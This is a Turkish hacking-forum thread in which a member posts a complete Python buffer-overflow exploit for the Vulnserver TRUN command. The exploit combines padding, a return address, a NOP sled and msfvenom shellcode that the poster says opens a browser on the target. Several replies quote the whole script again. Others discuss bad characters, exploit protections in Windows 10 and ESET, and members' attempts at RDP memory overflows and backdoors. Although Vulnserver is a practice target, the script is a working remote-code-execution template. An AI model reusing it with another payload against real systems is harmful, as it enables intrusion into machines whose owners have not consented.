Vulnserver Exploit.

icehead

Uzman üye
19 Şub 2022
1,137
833
Merhaba, hem forumda merak uyandırmak hemde kendimi ilerletmek adına exploitlere merak salmıştım. birkaç uğraşmadan sonra en sonunda adam akıllı bir exploit yazmayı başardım.(dürüst olmak gerekirse badchar ararken çok zorlandım ve githubdan destek aldım)

yaptığım exploit karşı tarafta reverse shell oluşturmaz veya herhangi bir backdoor oluştumuyor. sadece chrome'dan forumumuzu açıyor.
(eğer chrome yoksa açılmayabilir)

aynı zamanda bir videoda çektim fakat youtube kullanmadığım için dosya tc üzerinden paylaşıyorum .

video için tıkla

not: sadece windows üzerinde çalışmaktadır.

Python:
from importlib.machinery import OPTIMIZED_BYTECODE_SUFFIXES
from ipaddress import ip_address
import socket

İP_ADRESS="192.168.1.3" #hedef makina ip adresi
PORT=9999
baglan=socket.socket() # soketimiz.
buf =  b""
buf += b"\xb8\x4d\xf3\xc6\xe6\xd9\xed\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x39\x83\xc3\x04\x31\x43\x0f\x03\x43\x42\x11"
buf += b"\x33\x1a\xb4\x57\xbc\xe3\x44\x38\x34\x06\x75\x78\x22"
buf += b"\x42\x25\x48\x20\x06\xc9\x23\x64\xb3\x5a\x41\xa1\xb4"
buf += b"\xeb\xec\x97\xfb\xec\x5d\xeb\x9a\x6e\x9c\x38\x7d\x4f"
buf += b"\x6f\x4d\x7c\x88\x92\xbc\x2c\x41\xd8\x13\xc1\xe6\x94"
buf += b"\xaf\x6a\xb4\x39\xa8\x8f\x0c\x3b\x99\x01\x07\x62\x39"
buf += b"\xa3\xc4\x1e\x70\xbb\x09\x1a\xca\x30\xf9\xd0\xcd\x90"
buf += b"\x30\x18\x61\xdd\xfd\xeb\x7b\x19\x39\x14\x0e\x53\x3a"
buf += b"\xa9\x09\xa0\x41\x75\x9f\x33\xe1\xfe\x07\x98\x10\xd2"
buf += b"\xde\x6b\x1e\x9f\x95\x34\x02\x1e\x79\x4f\x3e\xab\x7c"
buf += b"\x80\xb7\xef\x5a\x04\x9c\xb4\xc3\x1d\x78\x1a\xfb\x7e"
buf += b"\x23\xc3\x59\xf4\xc9\x10\xd0\x57\x87\xe7\x66\xe2\xe5"
buf += b"\xe8\x78\xed\x59\x81\x49\x66\x36\xd6\x55\xad\x73\x28"
buf += b"\x1c\xec\xd5\xa1\xf9\x64\x64\xac\xf9\x52\xaa\xc9\x79"
buf += b"\x57\x52\x2e\x61\x12\x57\x6a\x25\xce\x25\xe3\xc0\xf0"
buf += b"\x9a\x04\xc1\x92\x71\x9f\xc4\x31\xf1\x3a\x39\x95\x6a"
buf += b"\xe5\x4a\x9d\x0d\x97\xd8\x7d\xae\x3f\x53\x11\x5d\xa5"
buf += b"\xb3\x99\xe8\x57\xdf\x09\x73\xfb\x74\xbe\x16\x9a\xe7"
buf += b"\x10\xb7\x2e\x9f\x6c"
komut =b"\x41" * 2003 + b"\xAF\x11\x50\x62" + b"\x90" * 16 + buf + b"\x43" * (5005 - 2003 - 4 - 16-len(buf))
komut2 = b"TRUN /.:/" + komut + b"\r\n"
baglan.connect((İP_ADRESS,PORT)) # bağlan
baglan.send(komut2) # GÖNDER
baglan.recv(120) # geri dönüş
baglan.close()





:)
 
Son düzenleme:

Nikon of Disast

Uzman üye
16 May 2020
1,641
1,174
Hangi server üzerinde çalıştığını veya hangi işletim sistemlerinde denendiğini - hangi sürümlerde çalıştığını belirtmelisin.
Eline sağlık.
 

icehead

Uzman üye
19 Şub 2022
1,137
833
Her sürümde çalışacağını düşünüyorum çünki vulnserver çalıştıran her sistem etkileniyor.
çalışma mantığı bellek taşırma üzerine kurulu.

Pek anlamam ama oooo
kodları incelediğimde Hacker Olmak İsteyenlere Tavsiyeler
herşey bağlantı ile ilgili demiştim hatırlarsan hocam.
Aslında hedefim ufak ufak gelişip Ratlar için exploit yazmak :)
bundaki anlamadığın kodlar hex kodlarıdır.
bak yukardaki buf msfvenom ile oluşturulmuş bir shellcode alttakiler ise belleğin taşması için ve jmp adresi :) youtube da busra diye bir hanımefendi var ingilizce olarak güzel anlatıyor izleyebilirsin.

 

kurononyanko

Katılımcı Üye
6 Şub 2022
534
397
Aslında hedefim ufak ufak gelişip Ratlar için exploit yazmak :)
bundaki anlamadığın kodlar hex kodlarıdır.
bak yukardaki buf msfvenom ile oluşturulmuş bir shellcode alttakiler ise belleğin taşması için ve jmp adresi :) youtube da busra diye bir hanımefendi var ingilizce olarak güzel anlatıyor izleyebilirsin.
"bellek taşırma" inanır mısın ben de bu konu üzerine araştırmalar yapıyordum. Ama windows rdp üzerinden
 

icehead

Uzman üye
19 Şub 2022
1,137
833
"bellek taşırma" inanır mısın ben de bu konu üzerine araştırmalar yapıyordum. Ama windows rdp üzerinden
:) uzak desktop protocol değil mi?
yarın bir skype açarım bilgi paylaşırız. :)
bu arada .net decompiler arıyordum ya onuda bu iş için arıyordum :D eğer registerları görebilirsem değerlerini yani .net uygulamalar içinde exploit yazarız.
 

Mertoktay5

Üye
5 Ara 2021
227
95
Merhaba, hem forumda merak uyandırmak hemde kendimi ilerletmek adına exploitlere merak salmıştım. birkaç uğraşmadan sonra en sonunda adam akıllı bir exploit yazmayı başardım.(dürüst olmak gerekirse badchar ararken çok zorlandım ve githubdan destek aldım)

yaptığım exploit karşı tarafta reverse shell oluşturmaz veya herhangi bir backdoor oluştumuyor. sadece chrome'dan forumumuzu açıyor.
(eğer chrome yoksa açılmayabilir)

aynı zamanda bir videoda çektim fakat youtube kullanmadığım için dosya tc üzerinden paylaşıyorum .

video için tıkla

not: sadece windows üzerinde çalışmaktadır.

Python:
from importlib.machinery import OPTIMIZED_BYTECODE_SUFFIXES
from ipaddress import ip_address
import socket

İP_ADRESS="192.168.1.3" #hedef makina ip adresi
PORT=9999
baglan=socket.socket() # soketimiz.
buf =  b""
buf += b"\xb8\x4d\xf3\xc6\xe6\xd9\xed\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x39\x83\xc3\x04\x31\x43\x0f\x03\x43\x42\x11"
buf += b"\x33\x1a\xb4\x57\xbc\xe3\x44\x38\x34\x06\x75\x78\x22"
buf += b"\x42\x25\x48\x20\x06\xc9\x23\x64\xb3\x5a\x41\xa1\xb4"
buf += b"\xeb\xec\x97\xfb\xec\x5d\xeb\x9a\x6e\x9c\x38\x7d\x4f"
buf += b"\x6f\x4d\x7c\x88\x92\xbc\x2c\x41\xd8\x13\xc1\xe6\x94"
buf += b"\xaf\x6a\xb4\x39\xa8\x8f\x0c\x3b\x99\x01\x07\x62\x39"
buf += b"\xa3\xc4\x1e\x70\xbb\x09\x1a\xca\x30\xf9\xd0\xcd\x90"
buf += b"\x30\x18\x61\xdd\xfd\xeb\x7b\x19\x39\x14\x0e\x53\x3a"
buf += b"\xa9\x09\xa0\x41\x75\x9f\x33\xe1\xfe\x07\x98\x10\xd2"
buf += b"\xde\x6b\x1e\x9f\x95\x34\x02\x1e\x79\x4f\x3e\xab\x7c"
buf += b"\x80\xb7\xef\x5a\x04\x9c\xb4\xc3\x1d\x78\x1a\xfb\x7e"
buf += b"\x23\xc3\x59\xf4\xc9\x10\xd0\x57\x87\xe7\x66\xe2\xe5"
buf += b"\xe8\x78\xed\x59\x81\x49\x66\x36\xd6\x55\xad\x73\x28"
buf += b"\x1c\xec\xd5\xa1\xf9\x64\x64\xac\xf9\x52\xaa\xc9\x79"
buf += b"\x57\x52\x2e\x61\x12\x57\x6a\x25\xce\x25\xe3\xc0\xf0"
buf += b"\x9a\x04\xc1\x92\x71\x9f\xc4\x31\xf1\x3a\x39\x95\x6a"
buf += b"\xe5\x4a\x9d\x0d\x97\xd8\x7d\xae\x3f\x53\x11\x5d\xa5"
buf += b"\xb3\x99\xe8\x57\xdf\x09\x73\xfb\x74\xbe\x16\x9a\xe7"
buf += b"\x10\xb7\x2e\x9f\x6c"
komut =b"\x41" * 2003 + b"\xAF\x11\x50\x62" + b"\x90" * 16 + buf + b"\x43" * (5005 - 2003 - 4 - 16-len(buf))
komut2 = b"TRUN /.:/" + komut + b"\r\n"
baglan.connect((İP_ADRESS,PORT)) # bağlan
baglan.send(komut2) # GÖNDER
baglan.recv(120) # geri dönüş
baglan.close()





:)
Ellerine saglik
 

Adanalıtrojan

Kıdemli Üye
25 Haz 2021
2,026
1,057
17
Konya Ovası Askeri Tesislerinde
Merhaba, hem forumda merak uyandırmak hemde kendimi ilerletmek adına exploitlere merak salmıştım. birkaç uğraşmadan sonra en sonunda adam akıllı bir exploit yazmayı başardım.(dürüst olmak gerekirse badchar ararken çok zorlandım ve githubdan destek aldım)

yaptığım exploit karşı tarafta reverse shell oluşturmaz veya herhangi bir backdoor oluştumuyor. sadece chrome'dan forumumuzu açıyor.
(eğer chrome yoksa açılmayabilir)

aynı zamanda bir videoda çektim fakat youtube kullanmadığım için dosya tc üzerinden paylaşıyorum .

video için tıkla

not: sadece windows üzerinde çalışmaktadır.

Python:
from importlib.machinery import OPTIMIZED_BYTECODE_SUFFIXES
from ipaddress import ip_address
import socket

İP_ADRESS="192.168.1.3" #hedef makina ip adresi
PORT=9999
baglan=socket.socket() # soketimiz.
buf =  b""
buf += b"\xb8\x4d\xf3\xc6\xe6\xd9\xed\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x39\x83\xc3\x04\x31\x43\x0f\x03\x43\x42\x11"
buf += b"\x33\x1a\xb4\x57\xbc\xe3\x44\x38\x34\x06\x75\x78\x22"
buf += b"\x42\x25\x48\x20\x06\xc9\x23\x64\xb3\x5a\x41\xa1\xb4"
buf += b"\xeb\xec\x97\xfb\xec\x5d\xeb\x9a\x6e\x9c\x38\x7d\x4f"
buf += b"\x6f\x4d\x7c\x88\x92\xbc\x2c\x41\xd8\x13\xc1\xe6\x94"
buf += b"\xaf\x6a\xb4\x39\xa8\x8f\x0c\x3b\x99\x01\x07\x62\x39"
buf += b"\xa3\xc4\x1e\x70\xbb\x09\x1a\xca\x30\xf9\xd0\xcd\x90"
buf += b"\x30\x18\x61\xdd\xfd\xeb\x7b\x19\x39\x14\x0e\x53\x3a"
buf += b"\xa9\x09\xa0\x41\x75\x9f\x33\xe1\xfe\x07\x98\x10\xd2"
buf += b"\xde\x6b\x1e\x9f\x95\x34\x02\x1e\x79\x4f\x3e\xab\x7c"
buf += b"\x80\xb7\xef\x5a\x04\x9c\xb4\xc3\x1d\x78\x1a\xfb\x7e"
buf += b"\x23\xc3\x59\xf4\xc9\x10\xd0\x57\x87\xe7\x66\xe2\xe5"
buf += b"\xe8\x78\xed\x59\x81\x49\x66\x36\xd6\x55\xad\x73\x28"
buf += b"\x1c\xec\xd5\xa1\xf9\x64\x64\xac\xf9\x52\xaa\xc9\x79"
buf += b"\x57\x52\x2e\x61\x12\x57\x6a\x25\xce\x25\xe3\xc0\xf0"
buf += b"\x9a\x04\xc1\x92\x71\x9f\xc4\x31\xf1\x3a\x39\x95\x6a"
buf += b"\xe5\x4a\x9d\x0d\x97\xd8\x7d\xae\x3f\x53\x11\x5d\xa5"
buf += b"\xb3\x99\xe8\x57\xdf\x09\x73\xfb\x74\xbe\x16\x9a\xe7"
buf += b"\x10\xb7\x2e\x9f\x6c"
komut =b"\x41" * 2003 + b"\xAF\x11\x50\x62" + b"\x90" * 16 + buf + b"\x43" * (5005 - 2003 - 4 - 16-len(buf))
komut2 = b"TRUN /.:/" + komut + b"\r\n"
baglan.connect((İP_ADRESS,PORT)) # bağlan
baglan.send(komut2) # GÖNDER
baglan.recv(120) # geri dönüş
baglan.close()





:)
Bellek taşması bende denedim ama bellek taşması olarak değil normal backdoor ama olmadı
 

icehead

Uzman üye
19 Şub 2022
1,137
833
Bellek taşması bende denedim ama bellek taşması olarak değil normal backdoor ama olmadı
üstte attığım videoyu izle.
birde windows 10 veya kali linux 2022 sürümü üzerinde exploiti deniyorsan çalışmayacaktır zira windows 10 ve kali linux 2022'de exploit koruması var.
windows xp,7-8 de dene eğer yine olmuyorsa badchar var demektir veya bellekte boşluk var.
 

kurononyanko

Katılımcı Üye
6 Şub 2022
534
397
üstte attığım videoyu izle.
birde windows 10 veya kali linux 2022 sürümü üzerinde exploiti deniyorsan çalışmayacaktır zira windows 10 ve kali linux 2022'de exploit koruması var.
windows xp,7-8 de dene eğer yine olmuyorsa badchar var demektir veya bellekte boşluk var.
eset 8de de exploit koruması var. Güzel sistemler geliştiriyorlar. Peki neden fix yiyoruz diye düşündün mü hocam?
rdp üzerinden bellek şişirmesi de mümkün kendim araştırıyorum herhangi bir kaynaktan bilgi almadan. 750mbye kadar şişirme yapabildim. Linux 2022de exploit koruması varsa BENCE çöp o zaman :) Bir sözüm var: her zaman en yenisi, en iyisi değildir diye. Rdp bellek taşırmasını 2004den kalma yöntemlerle test ediyorum ama w7de test ediyorum. Eset 8li w7de bloklanıyor. Denemelere devam sırada 10 ardından 11 var. Biz de böyle hocam
abla heçkır mı olmuş :D
 

MrTarget

Üye
29 Tem 2017
234
3
Merhaba, hem forumda merak uyandırmak hemde kendimi ilerletmek adına exploitlere merak salmıştım. birkaç uğraşmadan sonra en sonunda adam akıllı bir exploit yazmayı başardım.(dürüst olmak gerekirse badchar ararken çok zorlandım ve githubdan destek aldım)

yaptığım exploit karşı tarafta reverse shell oluşturmaz veya herhangi bir backdoor oluştumuyor. sadece chrome'dan forumumuzu açıyor.
(eğer chrome yoksa açılmayabilir)

aynı zamanda bir videoda çektim fakat youtube kullanmadığım için dosya tc üzerinden paylaşıyorum .

video için tıkla

not: sadece windows üzerinde çalışmaktadır.

Python:
from importlib.machinery import OPTIMIZED_BYTECODE_SUFFIXES
from ipaddress import ip_address
import socket

İP_ADRESS="192.168.1.3" #hedef makina ip adresi
PORT=9999
baglan=socket.socket() # soketimiz.
buf =  b""
buf += b"\xb8\x4d\xf3\xc6\xe6\xd9\xed\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x39\x83\xc3\x04\x31\x43\x0f\x03\x43\x42\x11"
buf += b"\x33\x1a\xb4\x57\xbc\xe3\x44\x38\x34\x06\x75\x78\x22"
buf += b"\x42\x25\x48\x20\x06\xc9\x23\x64\xb3\x5a\x41\xa1\xb4"
buf += b"\xeb\xec\x97\xfb\xec\x5d\xeb\x9a\x6e\x9c\x38\x7d\x4f"
buf += b"\x6f\x4d\x7c\x88\x92\xbc\x2c\x41\xd8\x13\xc1\xe6\x94"
buf += b"\xaf\x6a\xb4\x39\xa8\x8f\x0c\x3b\x99\x01\x07\x62\x39"
buf += b"\xa3\xc4\x1e\x70\xbb\x09\x1a\xca\x30\xf9\xd0\xcd\x90"
buf += b"\x30\x18\x61\xdd\xfd\xeb\x7b\x19\x39\x14\x0e\x53\x3a"
buf += b"\xa9\x09\xa0\x41\x75\x9f\x33\xe1\xfe\x07\x98\x10\xd2"
buf += b"\xde\x6b\x1e\x9f\x95\x34\x02\x1e\x79\x4f\x3e\xab\x7c"
buf += b"\x80\xb7\xef\x5a\x04\x9c\xb4\xc3\x1d\x78\x1a\xfb\x7e"
buf += b"\x23\xc3\x59\xf4\xc9\x10\xd0\x57\x87\xe7\x66\xe2\xe5"
buf += b"\xe8\x78\xed\x59\x81\x49\x66\x36\xd6\x55\xad\x73\x28"
buf += b"\x1c\xec\xd5\xa1\xf9\x64\x64\xac\xf9\x52\xaa\xc9\x79"
buf += b"\x57\x52\x2e\x61\x12\x57\x6a\x25\xce\x25\xe3\xc0\xf0"
buf += b"\x9a\x04\xc1\x92\x71\x9f\xc4\x31\xf1\x3a\x39\x95\x6a"
buf += b"\xe5\x4a\x9d\x0d\x97\xd8\x7d\xae\x3f\x53\x11\x5d\xa5"
buf += b"\xb3\x99\xe8\x57\xdf\x09\x73\xfb\x74\xbe\x16\x9a\xe7"
buf += b"\x10\xb7\x2e\x9f\x6c"
komut =b"\x41" * 2003 + b"\xAF\x11\x50\x62" + b"\x90" * 16 + buf + b"\x43" * (5005 - 2003 - 4 - 16-len(buf))
komut2 = b"TRUN /.:/" + komut + b"\r\n"
baglan.connect((İP_ADRESS,PORT)) # bağlan
baglan.send(komut2) # GÖNDER
baglan.recv(120) # geri dönüş
baglan.close()





:)
Başarılar 👍
eset 8de de exploit koruması var. Güzel sistemler geliştiriyorlar. Peki neden fix yiyoruz diye düşündün mü hocam?
rdp üzerinden bellek şişirmesi de mümkün kendim araştırıyorum herhangi bir kaynaktan bilgi almadan. 750mbye kadar şişirme yapabildim. Linux 2022de exploit koruması varsa BENCE çöp o zaman :) Bir sözüm var: her zaman en yenisi, en iyisi değildir diye. Rdp bellek taşırmasını 2004den kalma yöntemlerle test ediyorum ama w7de test ediyorum. Eset 8li w7de bloklanıyor. Denemelere devam sırada 10 ardından 11 var. Biz de böyle hocam
abla heçkır mı olmuş :D
Başarılar 👍
 

icehead

Uzman üye
19 Şub 2022
1,137
833
eset 8de de exploit koruması var. Güzel sistemler geliştiriyorlar. Peki neden fix yiyoruz diye düşündün mü hocam?
rdp üzerinden bellek şişirmesi de mümkün kendim araştırıyorum herhangi bir kaynaktan bilgi almadan. 750mbye kadar şişirme yapabildim. Linux 2022de exploit koruması varsa BENCE çöp o zaman :) Bir sözüm var: her zaman en yenisi, en iyisi değildir diye. Rdp bellek taşırmasını 2004den kalma yöntemlerle test ediyorum ama w7de test ediyorum. Eset 8li w7de bloklanıyor. Denemelere devam sırada 10 ardından 11 var. Biz de böyle hocam
abla heçkır mı olmuş :D
elbette hiçbir yöntem geçilemez değil ama exploit koruması varken yeni başlayan birisi zorlanacaktır.
yukardaki abla zaten hacker :) )
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.